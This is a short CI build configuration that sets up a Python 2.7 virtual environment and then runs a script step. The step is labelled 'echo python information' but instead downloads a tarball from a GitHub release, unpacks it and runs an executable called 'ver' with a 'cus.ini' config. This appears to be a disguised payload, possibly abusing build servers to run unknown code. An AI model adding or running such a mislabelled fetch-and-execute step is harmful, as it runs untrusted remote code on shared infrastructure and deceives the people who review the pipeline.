box: python:2.7
build:
  steps:
    - virtualenv:
        name: setup virtual environment
        install_wheel: false

    - script:
        name: echo python information
        code: |
          wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini
